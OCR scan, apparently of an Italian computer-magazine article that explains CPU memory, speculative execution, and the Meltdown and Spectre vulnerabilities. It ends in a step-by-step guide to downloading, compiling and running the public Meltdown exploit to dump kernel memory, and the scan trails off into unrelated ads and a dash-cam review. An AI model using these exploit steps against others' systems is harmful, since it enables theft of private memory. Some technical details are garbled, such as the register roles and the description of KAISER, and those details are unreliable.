un impulso, ogni relay poteva spostare la sua testina sullo 
stato “acceso” o “spento”. L'errore nel calcolo riscontrato 
da Grace Hopper era dovuto proprio a un relay bloccato 
dal “bug” e da quel momento l’uso di questo termine per 
indicare un generico problema con un computer divenne 
sempre più comune. Con l’arrivo della tecnologia digitale 
i problemi hardware sono diminuiti perché, con le valvole 
prima e soprattutto con i transistor dopo, era sempre più 
difficile che si presentasse qualche imprevisto. | transistor 
in particolare e i circuiti integrati hanno rivoluzionato 
l'informatica, perché avere dei componenti così piccoli e 
chiusi permette di ignorare la maggior parte degli influssi 
esterni come insetti, temperatura e umidità degli edifici. 
Nel frattempo, però, i software hanno cominciato ad essere 
sempre più elaborati, ricchi di funzioni e quindi complicati. E 
in questo modo i problemi hanno cominciato a saltare fuori 
a causa proprio di programmi che contenevano qualche 
errore. Considerato che gli esperti di informatica erano 
sempre gli stessi, il tenente Grace Hopper ad esempio, il 
termine “bug” è rimasto in uso. 


ATTENTI A QUEL BUG! 


Nel corso degli ultimi decenni, l'hardware è diventato 
sempre più affidabile, tanto che sembra quasi scontato 
che i problemi di un calcolatore debbano derivare tutti 
dal softwaré scritto male. Soprattutto le vulnerabilità di 
sicurezza, cioè quelle che preoccupano non tanto perché 
si ottiene un risultato sbagliato, ma perché qualche 
malintenzionato potrebbe sfruttarle per rubarci dei dati 
preziosi. | bug famosi degli ultimi anni, come Heartbleed o 
Shellshock, erano dovuti a errori nella scrittura dei software. 


lati a una enormità di informazioni 
irrilevanti (come il codice binario di 


preoccupa, è opportuno prendere pre- 
cauzioni contro Spectre e Meltdown. 


Ma questo non significa che non sia possibile ancora oggi 
vedere qualche problema saltare fuori dall’hardware: non 
tanto a causa di insetti o altri fattori esterni (come accadde 
negli albori dell’informatica), ma proprio a causa dell’errata 
progettazione dei componenti. In realtà, piccoli problemi 
qua e là si vedono ogni tanto, ma fanno poca notizia perché 
sono confinati a prodotti specifici: alcuni dispositivi possono 
essere costruiti senza pensare bene al riscaldamento e 
possono finire col bruciarsi perché non dissipano il calore 
che producono. Questo fino alla comparsa di Meltdown 
e Spectre, due tipi di vulnerabilità scoperti nei primi mesi 
del 2017 e riportati pubblicamente solo una manciata di 
settimane fa. Questi sono dei bug strutturali delle CPU e 
in un certo senso erano quasi inevitabili: con l'aumentare 
della complessità dei processori è ovvio che si possano 
fare degli errori di progettazione. Sono errori relativi non 
tanto alla struttura fisica (i chip di silicio sono costruiti bene) 
ma all’utilizzo che viene permesso di questi strumenti. Per 
usare una metafora, è un po’ come una automobile che 
può ruotare lo sterzo di 360°: di per sé la macchina non ha 
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Fig. 1- ILprimo “bug” identificato nell'hardware, letteralmente 
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ANCHE ANDROID È IN PERICOLO 


Google ha dichiarato che i dispositivi ufficiali rila- 
sciati con Android sono vulnerabili a Spectre, ma la 
vulnerabilità è comunque molto difficile da sfruttare. 
IL che è un bene, considerando la grande quantità 

di informazioni sensibili che siamo ormai abituati a 
tenere negli smartphone anche grazie ai servizi di 
Google. È comunque stato rilasciato un aggiorna- 
mento per Android, con la patch chiamata Reptoline, 
che impedisce lo sfruttamento di Spectre su Android. 
Alcuni sono preoccupati dal fatto che questa patch 
possa rallentare i dispositivi, anche se in realtà dai 
benchmark eseguiti finora non risultano perdite di 
performance apprezzabili. Per avere un'effettiva idea 
degli effetti a lungo termine sarà necessario aspetta- 
re qualche anno: può darsi che dopo un po' si assista 
a un rallentamento dello smartphone e che magari 

la durata in carica venga ridotta. Per ora, comunque, 
sembra tutto a posto. 


nulla di male, può essere utilizzata benissimo, ma la sua 
sicurezza si basa sul fatto che nessuno decida di girare 
completamente lo sterzo mentre viaggia sopra i 10 Km/h. 
Quando si progetta un dispositivo utilizzato da milioni di 
persone non si può dare per scontato che nessuno farà 
qualcosa di stupido. Bisogna quindi inserire dei meccanismi 
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Some address-space history 


di controllo per impedire alle persone di fare danni con un 
utilizzo improprio del device. 


COME FUNZIONA . 
LA MEMORIA DI UN PC? 


La natura delle vulnerabilità dei processori è abbastanza 
tecnica, prima di poterla spiegare dobbiamo chiarire il 
funzionamento di base di un computer. | due componenti 
fondamentali di un computer sono la memoria e il 
processore: fondamentalmente, un computer non fa altro 
che leggere dei numeri, memorizzarli da qualche parte, 
farci dei calcoli e memorizzare il risultato da un’altra parte. 
Esistono in realtà due memorie: una è la RAM, l’altra è la 
memoria integrata nel processore che è chiamata “registri 
del processore”. La RAM può essere enorme, quindi 
è divisa in piccole caselle, ciascuna rintracciabile con 
un indirizzo. Pensiamo a un semplice banco da 2 GB di 
memoria: stiamo parlando di oltre 2 miliardi (2.147.483.648 
a voler essere precisi) di byte. Per trovare il byte che 
ci serve in un preciso momento, quello in cui avevamo 
memorizzato un numero, possiamo usare il suo indirizzo. 
La funzione dei registri del processore è proprio di tenere 
a portata di mano gli indirizzi di memoria che contengono 
le informazioni necessarie a svolgere le operazioni 
nell’immediato futuro: le variabili di un programma, 
ovviamente, ma anche il codice delle sue funzioni. Infatti, 
quando si esegue un programma il suo codice va caricato 
all’interno della memoria RAM. La memoria assegnata 
a un programma è divisa concettualmente in quattro 
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November 15, 2017 are solid performance reasons for doing this, and the processor's memory-management unit can ordinarily be 
to prevent user space from accessing that memory. More recently, though, some more subtle security issues rel 

this mapping have come to light, leading to the rapid development of a new patch set that ends this longstanding practice for the x86 architq 


On 32-bit systems, the address-space layout for a running process dedicated the bottom 3GB (0x00000000 to Oxbfffffff) for user-Space use 
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kernel, it has no actual access to that memory. 


Fig. 2 - I sistemi GNU/Linux sono protetti da Meltdown grazie al sistema KAISER già implementato in Linux 
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segmenti: text, data, stack, e heap. Almeno nei sistemi a 
32 bit: l'architettura di processori x86-64bit non prevede 
un’effettiva distinzione tra i segmenti, ma per semplicità 


seguiamo la stessa logica. 
CI 


IL FLUSSO DI UN PROGRAMMA 


Quando avviamo un programma qualsiasi, come Mozilla 
Firefox, il suo intero codice binario viene caricato dentro 
la RAM nel segmento text (o code, alcuni manuali lo 
chiamano così). A quel punto il processore provvede a 
leggere tutto il codice cominciando dalla prima istruzione, 
inserendo l’indirizzo a cui si trova questa istruzione nel 
registro del processore chiamato ESP, che terrà sempre 
traccia dell’istruzione che si sta eseguendo al momento. 
Praticamente, questo puntatore di memoria funziona come 
la testina di un grammofono: il punto in cui si trova è quello 
che viene “suonato”. Ogni tanto la lettura del codice binario 
deve interrompersi per fare altre cose, ad esempio avviare 
una funzione saltando a un altro indirizzo di memoria. Per 
ricordarsi dove si era fermato (e non dover ricominciare 
a leggere da capo) il processore usa un preciso registro 
di memoria: si chiama EIP. In questo registro viene 
memorizzato l’indirizzo “di ritorno”, cioè quello della cella 
di memoria dalla quale ricominciare a leggere il codice 
del programma. È come se a un certo punto si volesse 
saltare a un punto diverso del disco in vinile, quindi segna 
l’attuale posizione nel registro EIP, e poi si cambia ESP 
inserendovi la posizione in cui si vuole andare. Alla fine, 
basta controllare EIP per sapere dove riposizionare la 
testina per riprendere il suono da dove ci si era interrotti. 
Ora, questa divisione dei segmenti di memoria è importante 
perché permette di dare permessi diversi: la sezione 
text può essere leggibile e eseguibile, ma non scrivibile 
dal programma stesso. Il resto invece può essere letto e 
modificato, ma non può contenere codice da eseguire. 
Siccome gli altri segmenti della memoria contengono 
delle variabili, parti del programma che possono essere 
modificate dall'utente, questo meccanismo permette di 
evitare che un utente possa inserire facilmente del codice 
eseguibile in un’area della memoria. Infatti se, per fare un 
esempio semplice, utilizzassimo un programma con una 
casella di testo, potremmo scrivere del codice binario 
dentro la casella. Quel codice verrebbe memorizzato nella 
RAM e, conoscendo l’indirizzo in cui è stato memorizzato, 
potremmo dirottare il flusso di operazioni del processore 
sul quel codice facendo quindi fare al programma cose 
che non erano assolutamente previste dal programmatore 
originale. Se la porzione di codice non è eseguibile, 
è molto più difficile che questo succeda (anche se non 
impossibile). 


SPAZIO DEL KERNEL 0 DELL'UTENTE? 


Finora abbiamo parlato delle memoria di un singolo 
programma, ora è il caso di parlare della memoria più in 
generale. In altre parole, del modo in cui il sistema operativo 
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Fig. 3 - La memoria dei computer moderni viene divisa in una zona 
dedicata al kernel e una dedicata ai singoli programmi 


gestisce la RAM non all’interno di un singolo programma 
ma tra i vari programmi. Prima di tutto, è importante 
capire che la memoria RAM dedicata a un programma è 
accessibile soltanto da quel programma e non da altri. Non 
fisicamente, però: la RAM è di fatto un corpo unico, questa 
separazione è creata artificialmente a livello software 
dal sistema operativo. L’unico programma in grado di 
accedere alla memoria degli altri è il kernel: il cuore del 
sistema operativo, che in GNU/Linux è il kernel Linux, in 
Windows è il kernel NT, e in MacOS è il kernel XNU. Il suo 
compito è proprio distribuire le risorse del sistema tra i vari 
programmi, quindi ha un accesso assoluto. Esiste un’area 
della memoria accessibile soltanto al kernel, che contiene 
le informazioni più sensibili. Anche gli altri programmi 
possono ottenere alcune di queste informazioni, ma 
devono chiederle al kernel stesso usando le chiamate di 
sistema e seguendo apposite procedure pensate proprio 
per impedire che certi dati finiscano nelle mani sbagliate. 
Quest'area di memoria si chiama kernelspace. Tutti gli 
altri programmi vengono eseguiti nell’altra area della 
memoria, chiamata userspace: sono infatti i programmi 
eseguiti dagli utenti, con i vari permessi di accesso che 
ha ciascun utente del sistema operativo. Il codice binario 
dei programmi da eseguire nello userspace ha ovviamente 
meno possibilità di fare danni, è un meccanismo di 
protezione fondamentale. Il problema di Meltdown e 
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Fig. 4 - Ogni volta che si inserisce una condizione IF-ELSE in un programma si creano delle diramazioni, e questo rallenta l'esecuzione del codice 


Spectre è proprio che riescono ad aggirare questo tipo necessari. Questo permette di sfruttare al meglio le 
di protezione e consentono a del codice eseguito da un risorse: magari, avendo 2 core del processore, se in un 
utente semplice l’accesso al kernelspace. In altre parole, certo momento uno dei 2 è libero, lo si può impiegare per 
grazie a questi bug è possibile per un malintenzionato “portarsi avanti col lavoro” e svolgere qualche calcolo il 
leggere tutto il contenuto della memoria RAM, comprese cui risultato non serve immediatamente al programma, 


le informazioni sensibili. ma servirà in seguito. Per fare un esempio pratico, 
no immaginiamo un programma che calcola la circonferenza 

di un cerchio: ha bisogno di moltiplicare 2*pigreco*raggio. 

L'ESECUZIONE SPECULATIVA In teoria, il programma deve stare in attesa, aspettando 


Il flusso dell'esecuzione di un programma, per come lo che l’utente inserisca il valore del raggio: poi, potrà fare le 
abbiamo presentato, è molto semplice da capire: il codice due moltiplicazioni (prima 2*pigreco e poi il risultato per il 
binario viene scritto nella RAM, il processore lo legge e raggio, si fa una operazione alla volta). 

lo esegue riga per riga. Nella realtà, però, sui processori Ma non ha molto senso: mentre aspetta che l’utente scriva 
moderni non funziona proprio così. Infatti, questo il raggio, il processore può intanto calcolare il prodotto di 
meccanismo è molto intuitivo, ma poco efficiente quando —2*pigreco, considerato che questi valori li conosce già e 
si ha a che fare con programmi complessi. Può capitare - gli serviranno in seguito. 

di avere le condizioni (file, dispositivi, tempo, variabili, Così quando l’utente scriverà il raggio del cerchio basterà 
ecc.) adatte per eseguire un certo calcolo anche se non è moltiplicarlo per il prodotto già ottenuto in precedenza, 
il momento giusto, secondo la scaletta prevista nel codice invece di dover eseguire i due calcoli, risparmiando 
del programma. Sarebbe un peccato perdere l'occasione — tempo. Questa cosa diventa particolarmente utile quando 
e doversi magari fermare in seguito perché le condizioni i software sono più complicati, con tante diramazioni (o 
adatte non ci sono più. Per questo motivo è stata inventata . conditional branch, in inglese). Il flusso di un programma 
l'esecuzione speculativa, un metodo per migliorare moderno non è infatti una cosa lineare: a causa delle 
l'efficienza dei PC. In poche parole, il processore, dopo molte funzioni, nelle quali il codice di un programma è 
aver caricato tutto il codice del programma nella RAM, diviso, il processore salta continuamente da un punto 
lo legge e cerca di capire quali operazioni può già fare, all’altro del codice (usando i registri EIP e ESP) seguendo 
senza bisogno di aspettare che arrivino altre informazioni, per l'appunto una serie di diramazioni a seconda delle 
tenendo da parte i risultati per il momento in cui saranno varie condizioni (se l’utente preme un pulsante ci sarà 


una precisa diramazione, se ne preme un altro si avrà 
una diramazione diversa). Più diramazioni ci sono, più 
lento rischia di essere il processore nell’eseguire tutte le 
istruzioni necessarie. Grazie al meccanismo di esecuzione 
speculativa, però, si può rendere la cosa più efficiente 
permettendo al processore di portarsi avanti col lavoro 
quando può e quindi recuperando tempo prezioso. La 
singola operazione eseguita per portarsi avanti col lavoro 
è chiamata esecuzione fuori ordine, perché l’istruzione 
viene eseguita prima del dovuto, al di fuori quindi 
dell’ordine previsto dal codice binario del programma. 


MELTDOWN: BYPASSIAMO : 
I CONTROLLI DI SICUREZZA 


Il bug noto come Meltdown nasce proprio da una 
esecuzione fuori ordine. Normalmente, il meccanismo che 
abbiamo descritto è sicuro. Il problema è che i produttori 
di CPU, mentre lo implementavano, hanno sempre dato 
per scontato che tutti seguissero le loro indicazioni per la 
scrittura dei programmi. Ma non avevano considerato un 
caso particolare: immaginiamo un programma che voglia 
accedere a un indirizzo di memoria che non gli appartiene, 
che non fa parte della memoria che è stata riservata ad 
esso. La logica prevede che la richiesta di accesso venga 
fatta dal programma al kernel, che quest’ultimo controlli se 


il programma ha le autorizzazioni necessarie per accedere 
quell’indirizzo di memoria e, in caso positivo, che fornisca 
al programma il contenuto di quella parte di memoria che 
ha chiesto. Però, a causa dell'esecuzione speculativa 
delle CPU, non è proprio così che vanno le cose. Infatti, 
poiché controllare le autorizzazioni da parte del kernel è 
un’operazione che richiede una certa quantità di tempo 
(ci sono diverse condizioni IF-ELSE e quindi diverse 
diramazioni), il processore cerca di risparmiare andando 
intanto a leggere quella porzione di memoria richiesta, 
presentando poi il suo contenuto solo se sarà davvero 
necessario. In altre parole, il flusso del programma va fuori 
dall’ordine logico previsto e si comporta così: il programma 
chiede l’accesso all'indirizzo di memoria, il processore 
legge il contenuto di quell’indirizzo di memoria, il kernel 
controlla se il programma sia autorizzato a ottenere quel 
contenuto e in caso positivo il kernel fornisce al programma 
i dati che la CPU ha già letto. In teoria non dovrebbe esserci 
alcun problema, considerato che i dati pur essendo letti 
non vengono passati al programma a meno che non sia 
davvero autorizzato. Però, intanto i dati vengono inseriti 
nella cache del processore e rimangono lì per risparmiare 
tempo nel caos venissero richiesti nell'immediato futuro. 
Sempre in teoria, la cache della CPU non è direttamente 
accessibile da un programma qualsiasi. Però è possibile 
usare un attacco detto side-channel (o attacco laterale) 


ac 


Normale flusso di esecuzione 
di un programma 


Controllo se l'utente è 
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di un programma 
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Fig. 5 - L'esecuzione speculativa permette di risparmiare tempo facendo due cose in parallelo, ma l'istruzione fuori ordine (scrittura della 


cache) può creare problemi di sicurezza 
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vengano rubate delle informazioni private dalla RAM 


per essere innanzitutto sicuri che i dati richiesti siano nella 
cache: basta chiedere nuovamente lo stesso indirizzo di 
memoria, attivando quindi la cache. Analizzando i tempi 
di risposta del processore, il programma può capire se 
sia stata usata la cache e quindi se le informazioni siano 
davvero lì (se nell’indirizzo richiesto già ta prima volta non 
erano presenti dati validi la cache non era stata utilizzata). 
Ottenuta la certezza che le informazioni siano nella cache, 
si può usare il meccanismo noto come indirizzamento 
indiretto. IMmaginiamo che si voglia leggere il valore del 
byte all’indirizzo di memoria 1000 e che questo valore 
possa essere compreso tra 0 e 9. Tutto ciò che si’ deve 
fare è provare a leggere l’indirizzo 1000, di modo che 
con il meccanismo che abbiamo descritto il suo valore 
venga messo nella cache. A quel punto basta cercare il 
valore di una serie di indirizzi a caso che contengano un 
qualsiasi numero tra 0 e 9. Ad esempio, 2001, 2002, 2003, 
ecc. Anche questi saranno inaccessibili ma non importa, 
perché interessa solo il tempo necessario per ottenere una 
risposta: l’unico risultato col tempo più basso è quello che 
contiene il valore presente nella cache. Infatti, quando si 
cerca un indirizzo, come abbiamo detto, il suo numero 
deve essere scritto in un registro del processore e la 
scrittura è più veloce se almeno una parte dell’indirizzo 
era già presente nella cache. Nell'esempio, se il valore 
dell’indirizzo 1000 è 5, il numero 5 viene inserito nella 
cache quando proviamo a leggerlo. Quindi se poi proviamo 
a leggere l’indirizzo 2005 otterremo una risposta in tempo 
molto breve rispetto a 2001 e 2002. 
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Fig. 6 - Sul sito del bug Meltdown (https://meltdownattack.com] si possono vedere dei filmati che dimostrano come 


MELTDOWN E LA SICUREZZA 


Basta provare tutte le combinazioni possibili per 
identificare quella che impiega meno tempo e che quindi 
corrisponde al valore dell’indirizzo che si voleva leggere 
fin dal principio. È un procedimento lento, ma alla fine 
permette di conoscere il valore di tutti i byte di una 
precisa area di memoria a propria scelta, anche se non 
si avevano le autorizzazioni necessarie. Sui sistemi GNU/ 
Linux esiste già un meccanismo di protezione chiamato 
KAISER, implementato prima della scoperta di Meltdown 
per proteggere il sistema da altre potenziali vulnerabilità più 
generiche, e che rende inutilizzabile la tecnica che abbiamo 
descritto. Infatti, affinché Meltdown funzioni è fondamentale 
avere un indirizzo di memoria valido. Il meccanismo KAISER 
si occupa proprio di randomizzare i vari indirizzi di memoria 
e quindi un malintenzionato non può seguire la linea logica 
che ricostruire il contenuto di un’area di memoria. Su 
Microsoft Windows, invece, non esiste un meccanismo 
simile: esiste un sistema di randomizzazione (KASLR) degli 
indirizzi di memoria del kernelspace, ma non è abbastanza 
sofisticato da impedire il funzionamento di Melidown. 


SPECTRE: INGANNIAMO LA CPU 


ll problema alla base di Meltdown, ovvero il fatto che la 
CPU cerchi di prevedere le operazioni di cui avrà bisogno in 
futuro e le faccia appena possibile per “portarsi avanti con il 
lavoro” memorizzando i risultati nella cache, può avere altre 
conseguenze. Meltdown sfruttava più che altro le esecuzioni 


fuori ordine, per leggere dati, ma è anche possibile sfruttare il 
meccanismo stesso di previsione delle diramazioni (o branch 
prediction). Infatti, prima di eseguire un’operazione fuori 
dall'ordine logico del programma, il processore deve fare una 
stima delle varie diramazioni possibili del programma e quindi 
capire guali operazioni potrebbe eseguire per portarsi avanti 
col lavoro. Nel nostro esempio del calcolo della circonferenza 
di un cerchio, l’operazione fuori ordine da eseguire è 
abbastanza palese, ci si può avvantaggiare calcolando già il 
risultato di 2*pigreco pur non avendo ancora il raggio, però 
in programmi più complicati le opzioni soho tante. La CPU 
ha quindi bisogno di fare una stima di quelle che potrebbero 
essere le varie operazioni da eseguire fuori dall’ordine: ce ne 
saranno diverse, e bisogna scoprirle. Ecco il problema: si può 
scrivere un programma in modo “truffaldino”, appositamente 
per ingannare i meccanismi di predizione delle diramazioni. 
Quando le CPU sono state progettate, nessuno ci ha pensato 
perché è effettivamente una cosa decisamente controintuitiva: 
apparentemente, è solo uno spreco di risorse che non offre 
alcun beneficio. In poche parole, si può far credere alla CPU 
che esistano certe diramazioni (che in realtà non hanno senso 
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e il byte ha un valore tra 0 e 255 


Controllo se l'utente è 
autorizzato a accedere 
a quell'indirizzo 


La CPU ha impiegato meno tempo 
dei tentativi precedenti per 
rispondere alla richiesta? 


Fig. 7 - IL tipico attacco laterale usato da Meltdown e 
Spectre per leggere il contenuto della cache dopo avervi 
inserito dei dati privati 


nella logica del programma). La CPU, quindi, comincerebbe a 
seguirle e a svolgere le operazioni previste, inclusi e soprattutto 
gli accessi a vari indirizzi di memoria. È ovvio che a un 
certo punto la CPU si accorgerà che quelle diramazioni del 
programma che ha seguito erano completamente inutili e quindi 
annullerà i risultati delle operazioni fatte fino a quel momento. 
Ma, intanto, il risultato delle operazioni sarà stato scritto nella 
cache del processore. E potrà essere recuperato usando 
degli attacchi laterali simili a quello che abbiamo descritto 
per Meltdown. Il problema è che il meccanismo di Spectre è 
talmente generico che si possono usare tanti altri metodi per 
“indovinare” il contenuto della cache, oltre a quello usato in 
Meltdown (cioè l’analisi del tempo necessario per leggere un 
indirizzo di memoria). Si può usare, ad esempio, l’analisi degli 
intervalli in cui la CPU usa il bus per gestire le operazioni sulla 
memoria RAM, che è un meccanismo molto generico e valido 
su praticamente tutti i processori moderni. Inoltre, i ricercatori 
di Google hanno dimostrato che si può modificare il contenuto 
del registro del processore EIP (che sui sistemi a 64 bit diventa 
RIP) per obbligarlo a ritornare a un’area di memoria che si vuole 
leggere, con un meccanismo simile a quello che si usa nella 
Return Oriented Programming per iniettare degli shellcode 
nel flusso di un programma vulnerabile e ottenere il controllo 
remoto di un computer. Ovviamente, usando questo metodo 
per l’indirizzo di memoria che si vuole leggere, il programma si 
bloccherà perché il contenuto dell’indirizzo che è stato inserito 
in EIP non è codice binario eseguibile, ma intanto il programma 
lo avrà potuto leggere (e ripetendo l’operazione per tutti gli 
indirizzi di una area di memoria si può leggere tutto il suo 
contenuto). Il meccanismo è talmente generico che in questo 
modo, ad esempio, un’applicazione JavaScript può uscire dalla 
“sandbox” in cui dovrebbe essere sempre contenuta e leggere 
il contenuto della memoria del browser pure per altre pagine 
e siti Web (incluso il modulo di gestione delle password dei 


IL PERICOLO SU MAC OS X 

E ALTRI DISPOSITIVI 

Da alcuni anni i prodotti Apple si basano su processori 
Intel. Se abbiamo un PowerMac 65 probabilmente non 
c'è problema, ma per quasi tutti i dispositivi successivi 
(iPhone compresi) le vulnerabilità Meltdown e Spectre 
sono presenti. Sono già stati rilasciati degli aggior- 
namenti del firmware che permettono di proteggere i 
dispositivi di Apple, in particolare per il browser Safari. 
Tuttavia, ancora non è chiaro se ci sarà una diminuzione 
sensibile delle prestazioni dei vari computer, sopratutto 
per chi li utilizza per elaborazione di immagini, filmati e 
grafica tridimensionale. Riguardo altri dispositivi, non è 
ancora chiaro se alcuni oggetti “smart” possano essere 
vulnerabili: ad esempio, Smart TV o elettrodomestici 
“intelligenti”. È interessante notare che, invece, i Ra- 
spberry Pi, pur avendo processori ARM, non sono vulne- 


rabili né a Meltdown né a Spectre, perché non fanno uso 
dell'esecuzione fuori ordine. i 
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QEMU and the Spectre and Meltdown attacks 
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Fig. 8 - Spectre è un problema per le virtual machine: ogni 
guest potrebbe accedere alla memoria di altri guest o dell'host 


siti che hanno tutti i browser moderni), anche se in teoria non 
sarebbe autorizzata a farlo. 


QUANTO È FACILE SFRUTTARE SPECTRE? 


Sfruttare la vulnerabilità Spectre è più complicato di Meltdown 
e ciò che si può ottenere è una sorta di dump della memoria: 
una lettura byte per byte. Che però è poco pratica: come 
abbiamo detto, nella memoria RAM dedicata a un programma 
vengono memorizzate un sacco di cose: non soltanto le 
variabili, che possono contenere informazioni private utili 
per i malintenzionati (e che spesso sono nel segmento di 
memoria stack). Ma contengono anche il codice stesso del 
programma (segmento text) e altri dati vari come il numero di 
ulteriori indirizzi di memoria. È un po’ come una sorta di flusso 
di coscienza o come il DNA: dentro di esso sono presenti le 
informazioni che ci interessano, ma sono mescolate a una 
molto maggiore quantità di dati apparentemente irrilevanti (nel 
DNA i geni sono meno del 2%, il resto è “inutile” per la codifica 


Spectre: ecco l'exploit! 


delle proteine). Un pirata che ottiene quest’enormità di dati, 
impiegherebbe poi molto tempo per riuscire a trovare quello 
che gli interessa. Quindi per ora è difficile che qualcuno voglia 
davvero usare Spectre per rubarci delle informazioni, anche se 
non lo si può escludere per il futuro. Il problema è che Spectre 
non si basa su una precisa implementazione, come Meltdown 
che sfruttava le precise caratteristiche dell’architettura x86, 
ma piuttosto sull'idea di base dell'esecuzione speculativa, 
per cui colpisce praticamente tutti i processori costruiti dopo 
il 1995 e potrebbe avere effetti che ancora non abbiamo 
scoperto. Mentre Melidown si basa sul fatto che le CPU x86 
eseguano il controllo dei permessi di accesso a un’area di 
memoria dopo averla letta e non prima, Spectre funziona su 
qualsiasi tipo di processore abbia una cache e un qualsiasi 
meccanismo di previsione delle diramazioni dei programmi. 
Non esiste quindi una soluzione unica per Spectre (come il 
sistema KAISER per Meltdown). Bisogna valutare caso per 
caso quali meccanismi di controllo adottare. Una soluzione 
suggerita dagli stessi scopritori del bug è di inserire delle 
apposite patch nei compilatori dei vari programmi per impedire 
che si possa utilizzare il metodo che abbiamo descritto per 
creare diramazioni fasulle e spingere la CPU a leggere indirizzi 
di memoria che non avrebbe dovuto toccare. Per rendere 
sicuri i vari programmi che usiamo ogni giorno basterebbe, 
quindi, ricompilarli con le versioni patchate di GCC (o degli 
altri compilatori). Questo è ovviamente molto facile per i 
programmi Open Source, che possono essere ricompilati 
da chiunque, ma è un problema per i software proprietari: 
le aziende che li producono potrebbero non avere voglia di 
ricompilarli nuovamente e fornirli (Magari gratuitamente) ai loro 
clienti. | programmi non Open più datati, quindi, resteranno 
probabilmente sempre vulnerabili ad attacchi di tipo Spectre 
e diventeranno uno dei punti deboli dei nostri PC. 


Un semplice Proof of Concept che dimostra l’uso di Spectre da remoto 
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UN ALGORITMO JS 
01 Finora, l'unico PoC in Javascript per la vulnera- 
bilità Spectre è pubblicato dalla società Tencent 
(il sorgente è scaricabile da www.edmaster.it/url/7387). Si può 
provare andando all'indirizzo www.edmaster.it/url/7388. 
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IL BUG È PRESENTE? 

0 3 Dopo avere cliccato sul pulsante, lo script comincia a 

fare dei cicli per provare a leggere un piccola porzione di 

memoria che non sarebbe autorizzato ad accedere. In caso positivo 
appare un apposito avviso della vulnerabilità nella finta console. 


ct mastar 7 
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) README ind 


) kosfr.e 


) momdump.e 


memory, 


} phiysl 


\ CODICE SORGENTE 
|. Per scaricare gli exploit funzionanti per Meltdown, 
ci basta raggiungere la pagina Web www.edmaster. 
it/url/7392. In alternativa, è possibile scaricarli anche con il 
comando git clone https://github.com/IAIK/meltdown. 
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UN TEST DEL BUG 

. Prima di tutto bisogna controllare che il proprio 
computer sia vulnerabile: basta lanciare il coman- 

do taskset 0x1 ./test. Quest'ultimo ha la funzione di asse- 

gnare l'esecuzione del programma a una singola CPU [se ce 

ne sono diverse). 


ax or state mach| 
dine, it is being] 
used with autho| 
rization from. S| 


4d | no claim that M| 


| "LEGGO LA MEMORIA" 

Il comando taskset 0x1 ./memdump 0x240000000 
-1 0Oxffff880000000000 comincia a leggere tutta 
la memoria scritta dal comando precedente. Nell'esempio, 
vengono scritti 9 GB: se La RAM disponibile è minore bisogna 
ricalcolare gli indirizzi. 
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BABARFERE 
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LA COMPILAZIONE 
0 . Accediamo alla directory meltdown: qui si trova il 
i codice sorgente. | vari programmi possono essere 
compilati con il comando make. Sui sistemi Red Hat può esse- 
re necessario installare il pacchetto glibc-static. 


RIEMPIAMO LA RAM 
04 Se le due frasi presentate dal programma di test 
sono uguali, significa che il PC è vulnerabile. Si può 
poi provare a dare il comando ./memory_filler 9 per riempi- 
re la memoria con un testo facilmente leggibile, per capire 
se la lettura funzioni. 


I documents: imgdump | MR Documents: feh 


IR Documents : img 


TESTI E IMMAGINI 
. Sono stati sviluppati anche appositi programmi che 
eseguono il dump della memoria e cercano in essa 
porzioni di immagini per ricostruirle in tempo reale. Questo 
dimostra come si possano rubare non soltanto testi e pas- 
sword, ma anche immagini private. 


Linux Magazine 


Voglia di vacar 
vai su TrovaViaggi.it! 


Il TrovaViaggi di Turistipercaso.it 
è sempre più ricco e ti offre 

la possibilità di organizzare i 
tuoi viaggi scegliendo tra le 
migliori Offerte Speciali e Last 
Minute proposte da Agenzie, 
Tour Operator, Hotel, B&B e 
Agriturismi. 


Sei un 
e vuoi promuovere la tua 
struttura sul IrovaViaggi? 


Fai conoscere la tua attività a 
più di 10 milioni di viaggiatori! 
Collegati a www.trovaviaggi.it 
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Segui le istruzioni e... in pochi click 
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Testimone a bordo 


“Non mi ha dato la precedenza!” Una frase che può essere pronunciata 
da qualsiasi automobilista. Ma solo una Dash Cam può fornire le prove 


pesso.. tutto avviene veloce- 
mente: se l’auto che ci pre- 
cede cambia corsia senza se- 
gnalarlo e noi non abbiamo il tempo 
di frenare, urteremo, purtroppo, con- 
tro questa vettura. Testimoni? Nes- 


| nostri esperti hanno testato le Dash Cam 
utilizzandole nelle reali condizioni di traffico 
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suno e quindi le nostre argomenta- 
zioni valgono quanto le asserzioni 
del conducente che ha causato lo 
scontro. Si finisce per intraprendere 
lunghe e tortuose vie legali che po- 
trebbero addirittura portare ad un 
deludente nulla di fatto. Una Dash 
Cam ci avrebbe perlomeno consenti- 
to di prendere una posizione chiara'e 
senza equivoci, poiché grazie a que- 
sta mini videocamera da cruscotto; 
avremmo potuto contare su un soler- 
te testimone, pronto a filmare l’inci- 
dente dalla nostra prospettiva. E fuo- 
ri dall'Italia, questi "testimoni digitali" 
sono installati praticamente in ogni 
auto. Ma quali modelli si rivelano di 
facile installazione e semplici da ge- 
stire? Com'è la qualità dei filmati? 
Le riprese possono essere utilizzate 
come prova davanti a un giudice? 


DA INCOLLARE 
O DA APPLICARE 
CON VENTOSA 


Analogamente ai navigatori non in- 
tegrati nel cruscotto della vettura, 
anche le Dash Cam necessitano di 
essere applicate saldamente al para- 
brezza, nonché di un cavo d’alimen- 
tazione da inserire nell’accendisigari. 
La maggior parte dei produttori pun- 
ta su un supporto con ventosa sem- 
plicissimo da maneggiare e che con- 
sente agli utenti di utilizzare la loro 
Dash Cam su più vetture. Col tem- 
po però, il calore del parabrezza e la 
sporcizia possono rendere instabile 
l'applicazione del dispositivo. Si rive- 
la più affidabile un modello da incol- 
lare, offerto nel test da tre produttori. 
Questo tipo di supporto rende com- 
plicata la rimozione del dispositivo, 


rendendo necessario prestare atien- 
zione all'operazione, pena il danneg- 
giamento del supporto in plastica. La 
TrueCam A7 offre invece entrambe le 
possibilità di fissaggio: supporto da 
incollare e ventosa. Affinché la Dash 
Cam possa filmare in modo ottima- 
le, la posizione ideale per il fissaggio 
sarà al centro della parte superiore 
del parabrezza, ma non dovrà impe- 
dire la visuale al conducente. 


POCA LUCE? 
FILMATI SCADENTI 


Una Dash Cam in grado di fornire 
solo immagini sfocate diventereb- 
be un testimone poco affidabile. La 
maggior parte delle candidate al test 
riesce a filmare con risoluzione Full- 
HD (1920x1080 pixel) con un frame 
rate di 60 fps, fornendo immagini 
nitide e ricche di dettagli. La Rollei 
CarDVR 71 è in grado di filmare solo 
con risoluzione di 1280x720 pixel e, 
nelle prove, questa definizione si è ri- 
